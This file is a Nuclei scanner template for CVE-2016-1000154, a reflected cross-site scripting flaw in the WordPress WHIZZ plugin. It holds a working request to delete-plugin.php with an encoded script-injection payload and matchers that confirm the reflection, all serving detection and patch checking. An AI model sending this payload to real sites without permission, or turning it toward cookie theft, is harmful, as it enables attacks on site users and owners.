nuclei-templates/http/cves/2016/CVE-2016-1000154.yaml

66 lines
2.3 KiB
YAML

id: CVE-2016-1000154
info:
name: WordPress WHIZZ <=1.0.7 - Cross-Site Scripting
author: daffainfo
severity: medium
description: WordPress plugin WHIZZ 1.07 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
remediation: |
Update WordPress WHIZZ plugin to the latest version (>=1.0.8) which includes a fix for the XSS vulnerability.
reference:
- http://www.vapidlabs.com/wp/wp_advisory.php?v=112
- https://wordpress.org/plugins/whizz
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000154
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000154
cwe-id: CWE-79
epss-score: 0.00142
epss-percentile: 0.4984
cpe: cpe:2.3:a:browserweb:whizz:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 2
vendor: browserweb
product: whizz
framework: wordpress
tags: cve2016,cve,wordpress,xss,wp-plugin,browserweb
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/whizz/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'WHIZZ'
- 'Tags:'
condition: and
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 490a0046304402204b91d71900ed53024ef6b9293e7690212af20ec32856c78d8f4b1ae792532f34022040637c20d9eaea77b61f7aee3d23412e885ddd6ae39b680bbbd0335c7c51c694:922c64590222798bb761d5b6d8e72950